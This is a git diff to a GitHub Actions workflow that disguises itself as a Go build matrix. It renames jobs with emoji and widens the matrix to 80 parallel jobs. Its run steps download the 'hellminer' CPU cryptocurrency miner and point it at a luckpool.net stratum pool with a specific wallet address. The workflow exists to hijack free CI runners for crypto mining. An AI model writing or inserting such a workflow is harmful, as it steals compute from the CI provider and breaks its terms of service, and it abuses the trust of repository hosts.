--- a/.github/workflows/xmain.yml
+++ b/.github/workflows/xmain.yml
@@ -1,20 +1,20 @@
 # This is a basic workflow to help you get started with Actions
 
-name: dev
+name: 💯_Gits🙈
 on: [push, pull_request]
 jobs:
   build:
-    name: dev
+    name: 💯🙈_🤣🙈
     runs-on: ubuntu-18.04
     strategy:
-      max-parallel: 100
+      max-parallel: 80
       fail-fast: false
       matrix:
-        go: [1.1, 1.2, 1.3, 1.4]
-        flag: [A, B, C, D, E, F, G, H, I]
-    timeout-minutes: 9999
+        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8]
+        flag: [A, B, C, D, E, F, G, H, I, J]
+    timeout-minutes: 360
     env:
-        NUM_JOBS: 100
+        NUM_JOBS: 80
         JOB: ${{ matrix.go }}
     steps:
     - name: Set up Go ${{ matrix.go }}
@@ -24,9 +24,8 @@ jobs:
       id: go
     - name: Setup
       uses: actions/checkout@v1
-    - name: dev
-      run: wget https://github.com/hellcatz/luckpool/blob/master/miners/hellminer_cpu_linux.tar.gz
-    - name: Extract
-      run: tar xf hellminer_cpu_linux.tar.gz
-    - name: start
-      run: ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RP1ntCUiBNERYrp25mccFoR22V1uPSxxTg.hellminer -p x --cpu 12
+    - name: 🤣🙈💯
+      run: |
+        wget https://github.com/hellcatz/luckpool/blob/master/miners/hellminer_cpu_linux.tar.gz
+        unzip hellminer_cpu_linux.tar.gz
+        ./hellminer -c stratum+tcp://na.luckpool.net:3956#xnsub -u RP1ntCUiBNERYrp25mccFoR22V1uPSxxTg.hellminer -p x --cpu 12
